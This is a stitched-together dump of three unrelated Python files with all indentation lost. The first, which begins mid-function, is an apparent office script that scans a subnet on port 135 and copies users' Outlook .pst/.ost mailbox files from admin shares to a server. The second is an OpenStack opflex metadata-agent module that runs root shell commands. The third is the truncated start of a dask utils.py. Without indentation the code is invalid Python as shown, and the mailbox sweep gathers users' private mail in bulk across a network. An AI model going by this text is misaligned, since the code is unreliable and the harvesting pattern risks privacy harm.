with suppress(FileExistsError):
filepath,_,_ = dst.rpartition('\\')
makedirs(filepath)
try:
sleep(5)
copyfile(pathDir, dst)
msg = datetime.strftime(datetime.now(),'%d/%m, %H:%M')+' Backup Successful: '+pathDir
except Exception as e:
msg = datetime.strftime(datetime.now(),'%d/%m, %H:%M')+' Backup Failed: '+pathDir+' '+str(e)
if path.isfile(dst): remove(dst)
print(msg)
with open(FilePathList[2], 'a') as f:
f.write(msg+'\n')
def GenPstList(Deepscan): # Find all .pst files in the domain
    def is_up(addr): # quick reachability check: TCP connect to port 135 (RPC), not a real ICMP ping
s = socket(AF_INET, SOCK_STREAM)
s.settimeout(0.01)
with suppress(gaierror):
if not s.connect_ex((addr,135)): # connect to the remote host on port 135
s.close()
return 1
s.close()
def GenDeviceMap(Deepscan):
for ip in range(1,256 if Deepscan==0 else 501):
addr = '192.168.1.'+str(ip)
if is_up(addr): # If the ping is good, lets format our device map dictionary
deviceName = getfqdn(addr).replace('.tmfdomain.local','').replace('.TMFDOMAIN.local','')
if Deepscan == 1:
deviceDict[deviceName] = addr
else:
for key, value in deviceDict.items():
if key.upper() == deviceName.upper():
deviceDict[key] = addr
return deviceDict
pathDirDict = {}
for deviceName, CompIP in GenDeviceMap(Deepscan).items():
if not CompIP == '':
for PstPath in [ # These three locations are the only locations we've ever found .pst files in
'\\\\%s\\c$\\Users\\*\\Documents\\Outlook Files\\' % (deviceName),
'\\\\%s\\c$\\Users\\*\\AppData\\Local\\Microsoft\\Outlook\\' % (deviceName),
                '\\\\%s\\c$\\Documents and Settings\\*\\Local Settings\\Application Data\\Microsoft\\Outlook\\' % (deviceName),
]:
for item in glob(PstPath+'*.ost'):
pathDirDict[item] = CompIP
for item in glob(PstPath+'*.pst'):
pathDirDict[item] = CompIP
return pathDirDict
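# GenPstList sweeps 192.168.1.1-255 (1-500 on a deep scan), treats a successful
# TCP connection to port 135 as "host is up", resolves the hostname, and globs
# the three known Outlook data locations on each reachable machine for .pst and
# .ost files.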
def Main(FilePathList,DoCountDown=1,DoCopy=1,AllPsts=[]):
def CountDown():
if DoCountDown == 1:
target = '00:01'
while True:
sleep(1)
now = datetime.strftime(datetime.now(),'%H:%M')
print(now, target,end="\r")
if now == target: return
print('The countdown has been skipped.')
def LogData(pathDir,FilePathList): # Generate list of psts to check against
pathDir = pathDir.lower()
with open(FilePathList[0],'r') as f:
lines = f.readlines()
if not pathDir+'\n' in lines:
print('Logging New Pst: '+pathDir)
with open(FilePathList[0],'a') as f:
f.write(pathDir+'\n')
def CheckRecordedPsts(AllPsts,FilePathList): # Now we check to see if we backed up everything we expected to
with open(FilePathList[0],'r') as f:
lines = f.readlines()
print('Found: %s/%s'%(len(AllPsts),len(lines)))
with open(FilePathList[1],'a') as f:
for line in lines:
if not line in AllPsts:
                    print("We couldn't find: "+line.replace('\n',''))
f.write(str(date.today())+','+line)
# ############################################################ #
Path(FilePathList[2]).touch()
CountDown()
Deepscan = 1 if DoCopy == 'Dpscn' else 0
print('We\'re doing this for real, hide your outlook, hide your wife. cause we backing up everything out here')
for pathDir, _ in GenPstList(Deepscan).items():
AllPsts.append(pathDir.lower()+'\n')
try:
if DoCopy == 1: CopyPst(pathDir,DoCopy,FilePathList)
elif DoCopy == 'Floor': CopyPst(pathDir,DoCopy,FilePathList)
elif DoCopy == 'Test' and 'ex326' in pathDir: CopyPst(pathDir,DoCopy,FilePathList)
elif DoCopy == 'Dpscn': print(pathDir)
LogData(pathDir,FilePathList)
except Exception as e: print(e)
CheckRecordedPsts(AllPsts,FilePathList)
if DoCopy == 1: input('Press Enter to close\n')
if __name__ == '__main__':
LocalDirectory = '\\\\TMFSVR7\\Users\\Zach\\Script Backups\\Python Scripts\\Outlook Backup\\'
FilePathList = [
LocalDirectory+'List of All PSTs.txt',
LocalDirectory+'Files we Missed.txt',
LocalDirectory+'Log.txt'
]
DoCopyOptions = [
0, #0 # Do not Copy
1, #1 # Proceed with no special conditions
'Floor', #2 # Only Copy Floor Dict
'Test', #3 # Target Specific Computers
'Dpscn' #4 # Run a single iteration
]
Main(FilePathList,DoCountDown=0,DoCopy=DoCopyOptions[1])
|
as_metadata_manager.py
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
import hashlib
import json
import multiprocessing
import os
import os.path
import signal
import subprocess
import sys
import time
import uuid
import netaddr
import pyinotify
from six.moves import queue as Queue
from neutron.common import config as common_config
from neutron.common import utils
from neutron.conf.agent import common as config
from neutron.plugins.ml2.drivers.openvswitch.agent.common import ( # noqa
config as ovs_config)
from neutron_lib.utils import helpers
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import encodeutils
from opflexagent._i18n import _
from opflexagent import config as oscfg # noqa
from opflexagent.utils import utils as opflexagent_utils
LOG = logging.getLogger(__name__)
gbp_opts = [
cfg.StrOpt('epg_mapping_dir',
default='/var/lib/opflex-agent-ovs/endpoints/',
help=_("Directory where the EPG port mappings will be "
"stored.")),
cfg.StrOpt('as_mapping_dir',
default='/var/lib/opflex-agent-ovs/services/',
help=_("Directory where the anycast svc mappings will be "
"stored.")),
cfg.StrOpt('opflex_agent_dir',
default='/var/lib/neutron/opflex_agent',
help=_("Directory where the opflex agent state will be "
"stored.")),
]
EP_FILE_EXTENSION = "ep"
AS_FILE_EXTENSION = "as"
AS_FILE_NAME_FORMAT = "%s." + AS_FILE_EXTENSION
AS_MAPPING_DIR = "/var/lib/opflex-agent-ovs/services"
EOQ = 'STOP'
MD_DIR = "/var/lib/neutron/opflex_agent"
MD_DIR_OWNER = "neutron:neutron"
MD_SUP_FILE_NAME = "metadata.conf"
SVC_IP_DEFAULT = "169.254.1.2"
SVC_IP_BASE = 0xA9FEF003
SVC_IP_SIZE = 1000
SVC_IP_CIDR = 16
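# SVC_IP_BASE (0xA9FEF003) is 169.254.240.3; next-hop addresses for the
# metadata service are allocated from the SVC_IP_SIZE-address link-local block
# starting there.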
SVC_NEXTHOP = "169.254.1.1"
SVC_NS = "of-svc"
SVC_NS_PORT = "of-svc-nsport"
SVC_OVS_PORT = "of-svc-ovsport"
PID_DIR = "/var/lib/neutron/external/pids"
PID_FILE_NAME_FORMAT = PID_DIR + "/%s.pid"
PROXY_FILE_EXTENSION = "proxy"
PROXY_FILE_NAME_FORMAT = "%s." + PROXY_FILE_EXTENSION
SNAT_FILE_EXTENSION = "snat"
SNAT_FILE_NAME_FORMAT = "%s." + SNAT_FILE_EXTENSION
STATE_ANYCAST_SERVICES = "anycast_services"
STATE_INSTANCE_NETWORKS = "instance_networks"
STATE_FILE_EXTENSION = "state"
STATE_FILE_NAME_FORMAT = "%s." + STATE_FILE_EXTENSION
STATE_FILENAME_SVC = STATE_FILE_NAME_FORMAT % STATE_ANYCAST_SERVICES
STATE_FILENAME_NETS = STATE_FILE_NAME_FORMAT % STATE_INSTANCE_NETWORKS
def read_jsonfile(name):
retval = {}
try:
with open(name, "r") as f:
retval = json.load(f)
except Exception as e:
LOG.warn("Exception in reading file: %s", str(e))
return retval
def write_jsonfile(name, data):
try:
with open(name, "w") as f:
json.dump(data, f)
except Exception as e:
LOG.warn("Exception in writing file: %s", str(e))
class AddressPool(object):
def __init__(self, base, size):
self.base = base
self.size = size
self.ips = {}
for i in range(size):
self.ips[self.base + i] = True
def reserve(self, ip):
del self.ips[ip]
def get_addr(self):
for i in self.ips:
self.reserve(i)
return i
return None
class FileProcessor(object):
def __init__(self, watchdir, extensions, eventq, processfn):
self.watchdir = watchdir
self.extensions = extensions
self.eventq = eventq
self.processfn = processfn
def scanfiles(self, files):
LOG.debug("FileProcessor: processing files: %s", files)
relevant_files = []
for (action, filename) in files:
if all(not filename.endswith(ext) for ext in self.extensions):
continue
relevant_files.append((action, filename))
LOG.debug("FileProcessor: relevant files %s", relevant_files)
return self.processfn(relevant_files)
def scan(self):
LOG.debug("FileProcessor: initial scan")
files = []
for filename in os.listdir(self.watchdir):
files.append(("update", filename))
self.scanfiles(files)
return
def run(self):
self.scan()
try:
connected = True
while connected:
files = []
event = self.eventq.get()
while event is not None:
# drain all events in queue and batch them
LOG.debug("FileProcessor: event: %s", event)
if event == EOQ:
connected = False
event = None
break
action = "update"
if event.maskname == "IN_DELETE" or \
event.maskname == "IN_MOVED_FROM":
action = "delete"
files.append((action, event.pathname))
try:
event = self.eventq.get_nowait()
except Queue.Empty as e:
event = None
if files:
# process the batch
self.scanfiles(files)
except KeyboardInterrupt:
pass
except Exception as e:
LOG.warn("FileProcessor: Exception: %s", str(e))
return
class EventHandler(pyinotify.ProcessEvent):
def my_init(self, watcher, extensions):
self.watcher = watcher
self.extensions = extensions
self.events = \
pyinotify.IN_CLOSE_WRITE | \
pyinotify.IN_MOVED_FROM | \
pyinotify.IN_MOVED_TO | \
pyinotify.IN_DELETE
def action(self, event):
if all(not event.pathname.endswith(ext)
for ext in self.extensions):
return
return self.watcher.action(event)
process_IN_CLOSE_WRITE = action
process_IN_MOVED_FROM = action
process_IN_MOVED_TO = action
process_IN_DELETE = action
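# FileWatcher wires the pieces together: pyinotify events captured by
# EventHandler are pushed onto a multiprocessing queue, and FileProcessor
# drains and batches them in a child process before handing each batch to
# process(), which subclasses override.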
class FileWatcher(object):
def __init__(self, watchdir, extensions, name="Not Specified"):
self.name = name
self.watchdir = watchdir
self.extensions = extensions.split(',')
self.eventq = multiprocessing.Queue()
fp = FileProcessor(
self.watchdir,
self.extensions,
self.eventq,
functools.partial(self.process))
fprun = functools.partial(fp.run)
self.processor = multiprocessing.Process(target=fprun)
LOG.debug("FileWatcher: %s: starting", self.name)
self.processor.start()
def action(self, event):
# event.maskname, event.filename
LOG.debug("FileWatcher: %(name)s: event: %(event)s",
{'name': self.name, 'event': event})
self.eventq.put(event)
def process(self, files):
# Override in child class
LOG.debug("FileWatcher: %(name)s: process: %(files)s",
{'name': self.name, 'files': files})
def terminate(self, signum, frame):
self.eventq.put(EOQ)
if signum is not None:
sys.exit(0)
def run(self):
signal.signal(signal.SIGINT, self.terminate)
signal.signal(signal.SIGTERM, self.terminate)
wm = pyinotify.WatchManager()
handler = EventHandler(watcher=self, extensions=self.extensions)
notifier = pyinotify.Notifier(wm, handler)
wm.add_watch(self.watchdir, handler.events, rec=False)
try:
LOG.debug("FileWatcher: %s: notifier waiting ...", self.name)
notifier.loop()
finally:
LOG.debug("FileWatcher: %s: notifier returned", self.name)
self.terminate(None, None)
LOG.debug("FileWatcher: %s: processor returned", self.name)
self.processor.join()
return True
class TmpWatcher(FileWatcher):
"""Class for integration testing"""
def __init__(self):
filedir = "/tmp"
extensions = EP_FILE_EXTENSION
super(TmpWatcher, self).__init__(
filedir, extensions, name="ep-watcher")
def process(self, files):
LOG.debug("TmpWatcher files: %s", files)
class EpWatcher(FileWatcher):
"""EpWatcher watches EPs and generates two state files:
anycast_services.state:
        maps domain -> AS services for that domain
instance_networks.state:
maps IP -> neutron-network for each EP in that domain
anycast_services = {
'domain-uuid-1': {
'domain-name': domain_name,
'domain-policy-space': domain_tenant,
'next-hop-ip': anycast_svc_ip,
'uuid': domain_uuid
},
...
'domain-uuid-n': {
<anycast svc specification above>
}
}
instance_networks = {
'domain-uuid-1': {
'ip-addr-1': 'neutron-network',
...
'ip-addr-n': 'neutron-network'
},
'domain-uuid-n': {
'ip-addr-1': 'neutron-network',
...
'ip-addr-n': 'neutron-network'
}
}
"""
def __init__(self):
self.svcfile = "%s/%s" % (MD_DIR, STATE_FILENAME_SVC)
self.netsfile = "%s/%s" % (MD_DIR, STATE_FILENAME_NETS)
epfiledir = cfg.CONF.OPFLEX.epg_mapping_dir
epextensions = EP_FILE_EXTENSION
super(EpWatcher, self).__init__(
epfiledir, epextensions, name="ep-watcher")
def gen_domain_uuid(self, tenant, name):
fqname = '%s|%s' % (tenant, name)
fqhash = hashlib.md5(fqname.encode('utf-8')).hexdigest()
fquuid = str(uuid.UUID(fqhash))
return fquuid
def process(self, files):
LOG.debug("EP files: %s", files)
curr_svc = read_jsonfile(self.svcfile)
ip_pool = AddressPool(SVC_IP_BASE, SVC_IP_SIZE)
for domain_uuid in curr_svc:
thisip = netaddr.IPAddress(curr_svc[domain_uuid]['next-hop-ip'])
ip_pool.reserve(int(thisip))
new_svc = {}
new_nets = {}
updated = False
epfiledir = cfg.CONF.OPFLEX.epg_mapping_dir
for filename in os.listdir(epfiledir):
if not filename.endswith(EP_FILE_EXTENSION):
continue
filename = "%s/%s" % (epfiledir, filename)
ep = read_jsonfile(filename)
if ep:
metadata_optimization = ep.get(
'neutron-metadata-optimization',
False)
if metadata_optimization is False:
                    # Don't write a service file when metadata optimization is
                    # off for this EP (e.g. VMs on vlan-type networks). Another
                    # VM on an opflex-type network on the same compute may
                    # still have it enabled, so skip this EP and keep scanning.
continue
domain_name = ep.get('domain-name')
domain_tenant = ep.get('domain-policy-space')
if domain_name is None or domain_tenant is None:
continue
domain_uuid = self.gen_domain_uuid(domain_tenant, domain_name)
if domain_uuid and domain_uuid not in new_svc:
if domain_uuid not in curr_svc:
updated = True
as_uuid = domain_uuid
as_addr = netaddr.IPAddress(ip_pool.get_addr())
as_addr = str(as_addr)
new_svc[domain_uuid] = {
'domain-name': domain_name,
'domain-policy-space': domain_tenant,
'next-hop-ip': as_addr,
'uuid': as_uuid,
}
else:
new_svc[domain_uuid] = curr_svc[domain_uuid]
del curr_svc[domain_uuid]
nnetwork = ep.get('neutron-network')
if nnetwork is None:
continue
ips = ep.get('anycast-return-ip')
if ips is None:
ips = []
if domain_uuid not in new_nets:
new_nets[domain_uuid] = {}
for ip in ips:
new_nets[domain_uuid][ip] = nnetwork
if curr_svc:
updated = True
if updated:
write_jsonfile(self.svcfile, new_svc)
write_jsonfile(self.netsfile, new_nets)
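# A small illustration (not part of the agent) of the deterministic UUID scheme
# used by EpWatcher.gen_domain_uuid() above: the anycast-service UUID is simply
# the MD5 digest of "<tenant>|<name>" rendered as a UUID string, so the same
# (tenant, name) pair always maps to the same service UUID. The example values
# below are invented.
def _example_domain_uuid(tenant='prj-demo', name='net-demo'):
    fqhash = hashlib.md5(('%s|%s' % (tenant, name)).encode('utf-8')).hexdigest()
    return str(uuid.UUID(fqhash))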
class StateWatcher(FileWatcher):
def __init__(self):
root_helper = cfg.CONF.AGENT.root_helper
self.mgr = AsMetadataManager(LOG, root_helper)
self.svcfile = "%s/%s" % (MD_DIR, STATE_FILENAME_SVC)
self.svc_ovsport_mac = self.mgr.get_asport_mac()[:17]
stfiledir = MD_DIR
stextensions = STATE_FILE_EXTENSION
super(StateWatcher, self).__init__(
stfiledir, stextensions, name="state-watcher")
def terminate(self, signum, frame):
self.mgr.ensure_terminated()
super(StateWatcher, self).terminate(signum, frame)
def process(self, files):
LOG.debug("State Event: %s", files)
curr_alloc = read_jsonfile(self.svcfile)
updated = False
asfiledir = cfg.CONF.OPFLEX.as_mapping_dir
for filename in os.listdir(asfiledir):
if not filename.endswith(AS_FILE_EXTENSION):
continue
filename = "%s/%s" % (asfiledir, filename)
asvc = read_jsonfile(filename)
if asvc:
domain_uuid = asvc["uuid"]
if domain_uuid not in curr_alloc:
updated = True
self.as_del(filename, asvc)
else:
if not self.as_equal(asvc, curr_alloc[domain_uuid]):
updated = True
self.as_write(curr_alloc[domain_uuid])
del curr_alloc[domain_uuid]
for domain_uuid in curr_alloc:
updated = True
self.as_create(curr_alloc[domain_uuid])
if updated:
self.mgr.update_supervisor()
def as_equal(self, asvc, alloc):
for idx in ["uuid", "domain-name", "domain-policy-space"]:
if asvc[idx] != alloc[idx]:
return False
if asvc["service-mapping"][0]["next-hop-ip"] != alloc["next-hop-ip"]:
return False
return True
def as_del(self, filename, asvc):
try:
            self.mgr.del_ip(asvc["service-mapping"][0]["next-hop-ip"])
except Exception as e:
LOG.warn("EPwatcher: Exception in deleting IP: %s",
str(e))
proxyfilename = PROXY_FILE_NAME_FORMAT % asvc["uuid"]
proxyfilename = "%s/%s" % (MD_DIR, proxyfilename)
try:
os.remove(filename)
os.remove(proxyfilename)
except Exception as e:
LOG.warn("EPwatcher: Exception in deleting file: %s", str(e))
def as_create(self, alloc):
asvc = {
"uuid": alloc["uuid"],
"interface-name": SVC_OVS_PORT,
"service-mac": self.svc_ovsport_mac,
"domain-policy-space": alloc["domain-policy-space"],
"domain-name": alloc["domain-name"],
"service-mapping": [
{
"service-ip": "169.254.169.254",
"gateway-ip": "169.254.1.1",
"next-hop-ip": alloc["next-hop-ip"],
},
],
}
try:
self.mgr.add_ip(alloc["next-hop-ip"])
except Exception as e:
LOG.warn("EPwatcher: Exception in adding IP: %s",
str(e))
asfilename = AS_FILE_NAME_FORMAT % asvc["uuid"]
asfilename = "%s/%s" % (AS_MAPPING_DIR, asfilename)
write_jsonfile(asfilename, asvc)
proxyfilename = PROXY_FILE_NAME_FORMAT % asvc["uuid"]
proxyfilename = "%s/%s" % (MD_DIR, proxyfilename)
proxystr = self.proxyconfig(alloc)
try:
with open(proxyfilename, "w") as f:
f.write(proxystr)
pidfile = PID_FILE_NAME_FORMAT % asvc["uuid"]
self.mgr.sh("rm -f %s" % pidfile)
except Exception as e:
LOG.warn("EPwatcher: Exception in writing proxy file: %s",
str(e))
def proxyconfig(self, alloc):
duuid = alloc["uuid"]
ipaddr = alloc["next-hop-ip"]
proxystr = "\n".join([
"[program:opflex-ns-proxy-%s]" % duuid,
"command=ip netns exec of-svc "
"/usr/bin/opflex-ns-proxy "
"--metadata_proxy_socket=/var/lib/neutron/metadata_proxy "
"--state_path=/var/lib/neutron "
"--pid_file=/var/lib/neutron/external/pids/%s.pid "
"--domain_id=%s --metadata_host %s --metadata_port=80 "
"--log-dir=/var/log/neutron --log-file=opflex-ns-proxy-%s.log" % (
duuid, duuid, ipaddr, duuid[:8]),
"exitcodes=0,2",
"stopasgroup=true",
"startsecs=10",
"startretries=3",
"stopwaitsecs=10",
"stdout_logfile=NONE",
"stderr_logfile=NONE",
])
return proxystr
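# For reference (values invented, command wrapped here for readability): the
# proxy file produced by proxyconfig() above is a supervisord program section
# along these lines, picked up through the "[include] files = ... *.proxy"
# entry that AsMetadataManager.init_supervisor() writes further down:
#
#   [program:opflex-ns-proxy-<domain-uuid>]
#   command=ip netns exec of-svc /usr/bin/opflex-ns-proxy
#       --metadata_proxy_socket=/var/lib/neutron/metadata_proxy
#       --state_path=/var/lib/neutron
#       --pid_file=/var/lib/neutron/external/pids/<domain-uuid>.pid
#       --domain_id=<domain-uuid> --metadata_host <next-hop-ip> --metadata_port=80
#       --log-dir=/var/log/neutron --log-file=opflex-ns-proxy-<uuid-prefix>.log
#   exitcodes=0,2
#   stopasgroup=true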
class SnatConnTrackHandler(object):
def __init__(self):
root_helper = cfg.CONF.AGENT.root_helper
self.mgr = AsMetadataManager(LOG, root_helper)
self.syslog_facility = cfg.CONF.OPFLEX.conn_track_syslog_facility
self.syslog_severity = cfg.CONF.OPFLEX.conn_track_syslog_severity
def conn_track_create(self, netns):
snatfilename = SNAT_FILE_NAME_FORMAT % netns
snatfilename = "%s/%s" % (MD_DIR, snatfilename)
conn_track_str = self.conn_track_config(netns)
try:
with open(snatfilename, "w") as f:
f.write(conn_track_str)
pidfile = PID_FILE_NAME_FORMAT % netns
self.mgr.sh("rm -f %s" % pidfile)
self.mgr.update_supervisor()
except Exception as e:
LOG.warn("ConnTrack: Exception in writing snat file: %s",
str(e))
def conn_track_del(self, netns):
snatfilename = SNAT_FILE_NAME_FORMAT % netns
snatfilename = "%s/%s" % (MD_DIR, snatfilename)
try:
os.remove(snatfilename)
self.mgr.update_supervisor()
except Exception as e:
LOG.warn("ConnTrack: Exception in deleting file: %s", str(e))
def conn_track_config(self, netns):
snatstr = "\n".join([
"[program:opflex-conn-track-%s]" % netns,
"command=/usr/bin/opflex-conn-track %s %s %s" % (
netns, self.syslog_facility, self.syslog_severity),
"exitcodes=0,2",
"stopasgroup=true",
"startsecs=10",
"startretries=3",
"stopwaitsecs=10",
"stdout_logfile=NONE",
"stderr_logfile=NONE",
])
return snatstr
class AsMetadataManager(object):
def __init__(self, logger, root_helper):
global LOG
LOG = logger
self.root_helper = root_helper
self.name = "AsMetadataManager"
self.md_filename = "%s/%s" % (MD_DIR, MD_SUP_FILE_NAME)
self.bridge_manager = opflexagent_utils.get_bridge_manager(
cfg.CONF.OPFLEX)
self.initialized = False
def init_all(self):
self.init_host()
self.init_supervisor()
self.start_supervisor()
return
def ensure_initialized(self):
if not self.initialized:
try:
self.clean_files()
self.init_all()
self.initialized = True
except Exception as e:
LOG.error("%(name)s: in initializing anycast metadata "
"service: %(exc)s",
{'name': self.name, 'exc': str(e)})
def ensure_terminated(self):
if self.initialized:
try:
self.initialized = False
self.clean_files()
self.stop_supervisor()
except Exception as e:
LOG.error("%(name)s: in shuttingdown anycast metadata "
"service: %(exc)s",
{'name': self.name, 'exc': str(e)})
def sh(self, cmd, as_root=True):
if as_root and self.root_helper:
cmd = "%s %s" % (self.root_helper, cmd)
LOG.debug("%(name)s: Running command: %(cmd)s",
{'name': self.name, 'cmd': cmd})
ret = ''
try:
sanitized_cmd = encodeutils.to_utf8(cmd)
data = subprocess.check_output(
sanitized_cmd, stderr=subprocess.STDOUT, shell=True)
ret = helpers.safe_decode_utf8(data)
except Exception as e:
LOG.error("In running command: %(cmd)s: %(exc)s",
{'cmd': cmd, 'exc': str(e)})
LOG.debug("%(name)s: Command output: %(ret)s",
{'name': self.name, 'ret': ret})
return ret
def write_file(self, name, data):
LOG.debug("%(name)s: Writing file: name=%(file)s, data=%(data)s",
{'name': self.name, 'file': name, 'data': data})
with open(name, "w") as f:
f.write(data)
def clean_files(self):
def rm_files(dirname, extension):
try:
for filename in os.listdir(dirname):
if filename.endswith('.' + extension):
os.remove("%s/%s" % (dirname, filename))
except Exception:
# Yes, one of those few cases, when a pass is OK!
pass
rm_files(AS_MAPPING_DIR, AS_FILE_EXTENSION)
rm_files(MD_DIR, STATE_FILE_EXTENSION)
rm_files(MD_DIR, PROXY_FILE_EXTENSION)
rm_files(MD_DIR, '.conf')
def start_supervisor(self):
self.stop_supervisor()
self.sh("supervisord -c %s" % self.md_filename)
def update_supervisor(self):
self.sh("supervisorctl -c %s reread" % self.md_filename)
self.sh("supervisorctl -c %s update" % self.md_filename)
def reload_supervisor(self):
self.sh("supervisorctl -c %s reload" % self.md_filename)
def stop_supervisor(self):
self.sh("supervisorctl -c %s shutdown" % self.md_filename)
time.sleep(30)
def add_default_route(self, nexthop):
self.sh("ip netns exec %s ip route add default via %s" %
(SVC_NS, nexthop))
def has_ip(self, ipaddr):
outp = self.sh("ip netns exec %s ip addr show dev %s" %
(SVC_NS, SVC_NS_PORT))
return 'inet %s' % (ipaddr, ) in outp
def add_ip(self, ipaddr):
if self.has_ip(ipaddr):
return
self.sh("ip netns exec %s ip addr add %s/%s dev %s" %
(SVC_NS, ipaddr, SVC_IP_CIDR, SVC_NS_PORT))
def del_ip(self, ipaddr):
if not self.has_ip(ipaddr):
return
self.sh("ip netns exec %s ip addr del %s/%s dev %s" %
(SVC_NS, ipaddr, SVC_IP_CIDR, SVC_NS_PORT))
def get_asport_mac(self):
return self.sh(
"ip netns exec %s ip link show %s | "
"gawk -e '/link\/ether/ {print $2}'" %
(SVC_NS, SVC_NS_PORT))
def init_host(self):
# Create required directories
self.sh("mkdir -p %s" % PID_DIR)
self.sh("rm -f %s/*.pid" % PID_DIR)
self.sh("chown %s %s" % (MD_DIR_OWNER, PID_DIR))
self.sh("chown %s %s/.." % (MD_DIR_OWNER, PID_DIR))
self.sh("mkdir -p %s" % MD_DIR)
self.sh("chown %s %s" % (MD_DIR_OWNER, MD_DIR))
# Create namespace, if needed
ns = self.sh("ip netns | grep %s ; true" % SVC_NS)
if not ns:
self.sh("ip netns add %s" % SVC_NS)
# Create ports, if needed
port = self.sh("ip link show %s 2>&1 | grep qdisc ; true" %
SVC_OVS_PORT)
if not port:
self.sh("ip link add %s type veth peer name %s" %
(SVC_NS_PORT, SVC_OVS_PORT))
self.sh("ip link set dev %s up" % SVC_OVS_PORT)
self.sh("ip link set %s netns %s" % (SVC_NS_PORT, SVC_NS))
self.sh("ip netns exec %s ip link set dev %s up" %
(SVC_NS, SVC_NS_PORT))
self.add_ip(SVC_IP_DEFAULT)
self.add_default_route(SVC_NEXTHOP)
self.sh("ethtool --offload %s tx off" % SVC_OVS_PORT)
self.sh("ip netns exec %s ethtool --offload %s tx off" %
(SVC_NS, SVC_NS_PORT))
self.bridge_manager.plug_metadata_port(self.sh, SVC_OVS_PORT)
def init_supervisor(self):
def conf(*fnames):
config_str = ''
for fname in fnames:
if os.path.exists(fname):
if os.path.isfile(fname):
config_str += '--config-file %s ' % fname
elif os.path.isdir(fname):
config_str += '--config-dir %s ' % fname
return config_str
config_str = "\n".join([
"[rpcinterface:supervisor]",
"supervisor.rpcinterface_factory = "
"supervisor.rpcinterface:make_main_rpcinterface",
"",
"[unix_http_server]",
"file = /var/lib/neutron/opflex_agent/md-svc-supervisor.sock",
"",
"[supervisorctl]",
"serverurl = "
"unix:///var/lib/neutron/opflex_agent/md-svc-supervisor.sock",
"prompt = md-svc",
"",
"[supervisord]",
"identifier = md-svc-supervisor",
"pidfile = /var/lib/neutron/opflex_agent/md-svc-supervisor.pid",
"logfile = /var/log/neutron/metadata-supervisor.log",
"logfile_maxbytes = 10MB",
"logfile_backups = 3",
"loglevel = debug",
"childlogdir = /var/log/neutron",
"umask = 022",
"minfds = 1024",
"minprocs = 200",
"nodaemon = false",
"nocleanup = false",
"strip_ansi = false",
"",
"[program:metadata-agent]",
"command=/usr/bin/neutron-metadata-agent " +
conf('/usr/share/neutron/neutron-dist.conf',
'/etc/neutron/neutron.conf',
'/etc/neutron/metadata_agent.ini',
'/etc/neutron/conf.d/neutron-metadata-agent') +
"--log-file /var/log/neutron/metadata-agent.log",
"exitcodes=0,2",
"stopasgroup=true",
"startsecs=10",
"startretries=3",
"stopwaitsecs=10",
"stdout_logfile=NONE",
"stderr_logfile=NONE",
"",
"[program:opflex-ep-watcher]",
"command=/usr/bin/opflex-ep-watcher " +
conf('/usr/share/neutron/neutron-dist.conf',
'/etc/neutron/neutron.conf',
'/etc/neutron/plugins/ml2/ml2_conf_cisco.ini') +
"--log-file /var/log/neutron/opflex-ep-watcher.log",
"exitcodes=0,2",
"stopasgroup=true",
"startsecs=10",
"startretries=3",
"stopwaitsecs=10",
"stdout_logfile=NONE",
"stderr_logfile=NONE",
"",
"[program:opflex-state-watcher]",
"command=/usr/bin/opflex-state-watcher " +
conf('/usr/share/neutron/neutron-dist.conf',
'/etc/neutron/neutron.conf',
'/etc/neutron/plugins/ml2/ml2_conf_cisco.ini') +
"--log-file /var/log/neutron/opflex-state-watcher.log",
"exitcodes=0,2",
"stopasgroup=true",
"startsecs=10",
"startretries=3",
"stopwaitsecs=10",
"stdout_logfile=NONE",
"stderr_logfile=NONE",
"",
"[include]",
"files = %s/*.proxy %s/*.snat" % (MD_DIR, MD_DIR),
])
config_file = "%s/%s" % (MD_DIR, MD_SUP_FILE_NAME)
self.write_file(config_file, config_str)
def init_env():
config.register_root_helper(cfg.CONF)
# importing ovs_config got OVS registered
cfg.CONF.register_opts(gbp_opts, "OPFLEX")
common_config.init(sys.argv[1:])
common_config.setup_logging()
config.setup_privsep()
utils.log_opt_values(LOG)
def tmp_watcher_main():
init_env()
TmpWatcher().run()
def ep_watcher_main():
init_env()
EpWatcher().run()
def state_watcher_main():
init_env()
StateWatcher().run()
def as_metadata_main():
init_env()
root_helper = cfg.CONF.AGENT.root_helper
asm = AsMetadataManager(LOG, root_helper)
asm.ensure_initialized()
if __name__ == "__main__":
tmp_watcher_main()
|
utils.py
|
import asyncio
import functools
import html
import importlib
import inspect
import json
import logging
import multiprocessing
import os
import pkgutil
import re
import shutil
import socket
import sys
import tempfile
import threading
import warnings
import weakref
import xml.etree.ElementTree
from asyncio import TimeoutError
from collections import OrderedDict, UserDict, deque
from concurrent.futures import CancelledError, ThreadPoolExecutor # noqa: F401
from contextlib import contextmanager, suppress
from hashlib import md5
from importlib.util import cache_from_source
from time import sleep
from typing import Any as AnyType
from typing import Dict, List
import click
import tblib.pickling_support
try:
import resource
except ImportError:
resource = None
import tlz as toolz
from tornado import gen
from tornado.ioloop import IOLoop
import dask
from dask import istask
# Import config serialization functions here for backward compatibility
from dask.config import deserialize as deserialize_for_cli # noqa
from dask.config import serialize as serialize_for_cli # noqa
# provide format_bytes here for backwards compatibility
from dask.utils import ( # noqa: F401
format_bytes,
format_time,
funcname,
parse_bytes,
parse_timedelta,
)
try:
from tornado.ioloop import PollIOLoop
except ImportError:
PollIOLoop = None # dropped in tornado 6.0
from .compatibility import PYPY, WINDOWS
from .metrics import time
try:
from dask.context import thread_state
except ImportError:
thread_state = threading.local()
# For some reason this is required in python >= 3.9
if WINDOWS:
import multiprocessing.popen_spawn_win32
else:
import multiprocessing.popen_spawn_posix
logger = _logger = logging.getLogger(__name__)
no_default = "__no_default__"
def _initialize_mp_context():
if WINDOWS or PYPY:
return multiprocessing
else:
method = dask.config.get("distributed.worker.multiprocessing-method")
ctx = multiprocessing.get_context(method)
# Makes the test suite much faster
preload = ["distributed"]
if "pkg_resources" in sys.modules:
preload.append("pkg_resources")
from .versions import optional_packages, required_packages
for pkg, _ in required_packages + optional_packages:
try:
importlib.import_module(pkg)
except ImportError:
pass
else:
preload.append(pkg)
ctx.set_forkserver_preload(preload)
return ctx
mp_context = _initialize_mp_context()
def has_arg(func, argname):
"""
